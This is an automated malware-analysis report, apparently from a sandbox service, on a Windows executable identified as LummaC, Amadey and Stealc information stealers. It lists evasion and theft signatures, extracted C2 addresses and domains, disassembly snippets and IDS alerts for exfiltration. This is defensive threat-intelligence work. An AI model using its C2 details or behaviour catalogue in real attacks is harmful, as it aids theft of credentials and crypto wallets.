Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1540375
MD5: 4aa75791152671db0dd310096a19f866
SHA1: a08bef3a430ae54d94217399bb72e5ece1968498
SHA256: f022c688cbbf7c4f3dc72d820933ccdc24e1b57968afc07d15f6d2609aab8d84
Tags: exe, user-Bitsight

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey's stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found API chain indicative of sandbox detection
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SIDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000005.00000003.2411955466.0000000004930000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 32.2.7d61336cf8.exe.a20000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: aae25c676b.exe.2528.9.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["licendfilteo.site", "dissapoiznw.store", "mobbipenju.store", "eaglepawnoy.store", "clearancek.site", "studennotediw.store", "bathdoomgaz.store", "spirittunek.store"], "Build id": "4SD0y4--legendaryy"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe ReversingLabs: Detection: 44%
Source: file.exe ReversingLabs: Detection: 39%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: BF3BS0M5707K28RGW9.exe, 00000006.00000003.2417253737.0000000005010000.00000004.00001000.00020000.00000000.sdmp, BF3BS0M5707K28RGW9.exe, 00000006.00000002.2550539027.0000000000A32000.00000040.00000001.01000000.0000000B.sdmp
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 12_2_00FCDBBE
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F9C2A2 FindFirstFileExW, 12_2_00F9C2A2
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD68EE FindFirstFileW,FindClose, 12_2_00FD68EE
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 12_2_00FD698F
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00FCD076
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00FCD3A9
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_00FD9642
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_00FD979D
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 12_2_00FD9B2B
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD5C97 FindFirstFileW,FindNextFileW,FindClose, 12_2_00FD5C97
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 9_2_00E799D0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_00E3D110
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 9_2_00E3FCA0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 9_2_00E46F91
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 9_2_00E349A0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 9_2_00E4D961
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h 9_2_00E73920
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 9_2_00E442FC
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then jmp eax 9_2_00E41ACD
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 9_2_00E74A40
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 9_2_00E35A50
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then jmp eax 9_2_00E41A3C
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 9_2_00E43BE2
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 9_2_00E41BEE
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 9_2_00E79B60
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov ebp, eax 9_2_00E3A300
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_00E79CE0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh 9_2_00E79CE0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h 9_2_00E5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_00E5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h 9_2_00E5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 9_2_00E5C470
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov word ptr [eax], cx 9_2_00E4D457
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 9_2_00E4B410
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h] 9_2_00E38590
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 9_2_00E46536
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh 9_2_00E5FD10
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 9_2_00E40EEC
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 9_2_00E36EA0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then movzx ecx, word ptr [ebp+00h] 9_2_00E3BEB0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 9_2_00E46EBF
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 9_2_00E41E93
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_00E75700
Source: firefox.exe Memory has grown: Private usage: 1MB later: 187MB

Networking

Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:62888 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:57946 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:58277 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:62514 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:59432 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:54706 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:55373 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:50802 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49847 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49848 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:51663 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:59965 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:62762 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:58137 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:58587 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49864
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:62596 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:55497 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:52894 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49894 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49933 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49926 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49955 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:52776 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:64986 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:64161 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:49662 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:59013 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:53812 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49987 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:60416 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49974 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:56136 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:60918 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50033 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:58560 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:62882 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:55538 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50041 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:58411 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50074 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:65037 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:56822 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:51774 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50111 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49712 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49713 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49714 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49710 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:49740 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49755 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49901 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50068 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50068 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:50058 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50067 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50067 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49993 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50072 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50080 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50083 -> 172.67.206.204:443
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: licendfilteo.site
Source: Malware configuration extractor URLs: dissapoiznw.store
Source: Malware configuration extractor URLs: mobbipenju.store
Source: Malware configuration extractor URLs: eaglepawnoy.store
Source: Malware configuration extractor URLs: clearancek.site
